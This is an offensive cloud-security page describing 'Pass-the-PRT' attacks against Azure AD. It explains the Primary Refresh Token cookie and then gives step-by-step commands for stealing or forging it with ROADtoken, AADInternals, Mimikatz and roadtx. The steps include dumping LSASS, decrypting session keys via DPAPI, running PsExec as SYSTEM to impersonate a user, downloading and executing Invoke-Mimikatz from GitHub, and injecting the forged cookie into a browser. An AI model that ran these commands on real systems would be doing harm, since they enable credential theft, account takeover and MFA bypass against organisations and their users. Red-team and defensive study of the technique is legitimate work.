Az - Pass the PRT


What is a PRT

Check if you have a PRT

Dsregcmd.exe /status

In the SSO State section, you should see AzureAdPrt set to YES.

In the same output you can also see whether the device is joined to Azure (in the AzureAdJoined field):

The PRT cookie is actually called x-ms-RefreshTokenCredential and is a JSON Web Token (JWT). A JWT has 3 parts, header, payload and signature, separated by . and all encoded in url-safe base64. A typical PRT cookie has the following header and body:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

The actual Primary Refresh Token (PRT) is encapsulated within the refresh_token, which is encrypted by a key under the control of Azure AD, rendering its contents opaque and undecryptable to us. The field is_primary signifies the encapsulation of the primary refresh token within this token. To ensure that the cookie remains bound to the specific login session it was intended for, the request_nonce is transmitted from the logon.microsoftonline.com page.

The LSASS process sends the KDF context to the TPM; the TPM uses the session key (obtained when the device was registered in AzureAD and stored in the TPM) together with that context to derive a key, and this derived key is used to sign the PRT cookie (JWT).

The KDF context is built from a nonce issued by AzureAD and the PRT, mixed with a context (random bytes) when the JWT is created.

Therefore, even if the PRT cannot be extracted because it's located inside the TPM, it's possible to abuse LSASS to request derived keys for new contexts and use the generated keys to sign cookies.

PRT Abuse Scenarios

As a regular user it's possible to request PRT usage by asking LSASS for SSO data. This can be done like native apps which request tokens from Web Account Manager (token broker). WAM passes the request to LSASS, which asks for tokens using a signed PRT assertion. Or it can be done with browser based (web) flows, where a PRT cookie is used as a header to authenticate requests to Azure AD login pages.

As SYSTEM you could steal the PRT if not protected by TPM or interact with PRT keys in LSASS using crypto APIs.

Pass-the-PRT Attack Examples

Attack - ROADtoken

For more info about this way check this post. ROADtoken will run BrowserCore.exe from the right directory and use it to obtain a PRT cookie. This cookie can then be used with ROADtools to authenticate and obtain a persistent refresh token.

To generate a valid PRT cookie the first thing you need is a nonce. You can get this with:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi19-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Or using roadrecon:

roadrecon auth prt-init

Then you can use roadtoken to get a new PRT (run the tool from a process of the user to attack):

.\ROADtoken.exe <nonce>

As a oneliner:

Invoke-Command -Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe -accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Then you can use the generated cookie to create login tokens using Azure AD Graph or Microsoft Graph:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD -AadAccessToken <token> -AccountId <acc_id>

Attack - Using roadrecon

Attack - Using AADInternals and a leaked PRT

Get-AADIntUserPRTToken gets the user's PRT token from an Azure AD joined or Hybrid joined computer. It uses BrowserCore.exe to get the PRT token.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Or if you have the values from Mimikatz you can also use AADInternals to create tokens:

# Mimikatz "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPRT.Length % 4) {$MimikatzPRT += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token as a cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

Go to https://login.microsoftonline.com, clear all cookies for login.microsoftonline.com and enter a new cookie.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Then go to https://portal.azure.com

The rest should be automatic. Make sure you can refresh the page and the cookie doesn't disappear; if it does, you may have made a mistake and have to go through the process again. If it doesn't, you should be good.

Attack - Mimikatz

Steps

  1. The PRT (Primary Refresh Token) is extracted from LSASS (Local Security Authority Subsystem Service) and stored for later use.

  2. The Session Key is extracted next. Since it was initially issued and then re-encrypted by the local device, it needs to be decrypted using the DPAPI masterkey. Detailed information about DPAPI (Data Protection API) can be found in these resources: HackTricks, and for an understanding of its application, refer to the Pass-the-cookie attack.

  3. After the Session Key is decrypted, the derived key and the context for the PRT are obtained. These are crucial for creating the PRT cookie. Specifically, the derived key is used to sign the JWT (JSON Web Token) that makes up the cookie. A comprehensive explanation of this process has been written by Dirk-jan, available here.

Note that if the PRT is inside the TPM and not inside lsass, mimikatz won't be able to extract it. However, it will be possible to obtain the key derived from a context from the TPM and use it to sign a cookie (check option 3).

You can find a detailed explanation of the process performed to extract this information here: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

This won't work after the August 2021 fix for obtaining PRTs of other users, since only the user can get his own PRT (a local admin cannot access other users' PRTs), but he can access his own.

You can use mimikatz to extract the PRT:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Copy the section labelled Prt and save it. Also extract the session key (the KeyValue of the ProofOfPossesionKey field), which you can see highlighted below. This is protected and we will need to use our DPAPI keys to decrypt it.

If you don't see any PRT data it could be that you don't have any PRTs because your device isn't Azure AD joined, or it could be that you are running an old version of Windows 10.

To decrypt the session key you need to elevate your privileges to SYSTEM so you run under the computer context and can use the DPAPI key to decrypt it. You can use the following commands to do so:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Option 1 - Full Mimikatz

  • Now you want to copy the Context value:

  • And the derived key value:

  • Finally you can use all this info to generate PRT cookies:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]
Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

The rest should be automatic. Make sure you can refresh the page and the cookie doesn't disappear; if it does, you may have made a mistake and have to go through the process again. If it doesn't, you should be good.

Option 2 - roadrecon using PRT

  • Renew the PRT first, which will be saved in roadtx.prt:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

  • Now we can request tokens using the interactive browser with roadtx browserprtauth. If we use the roadtx describe command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Option 3 - roadrecon using derived keys

Having the context and derived key extracted by mimikatz, it's possible to use roadrecon to generate a new signed cookie with:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derived-key <derived key>
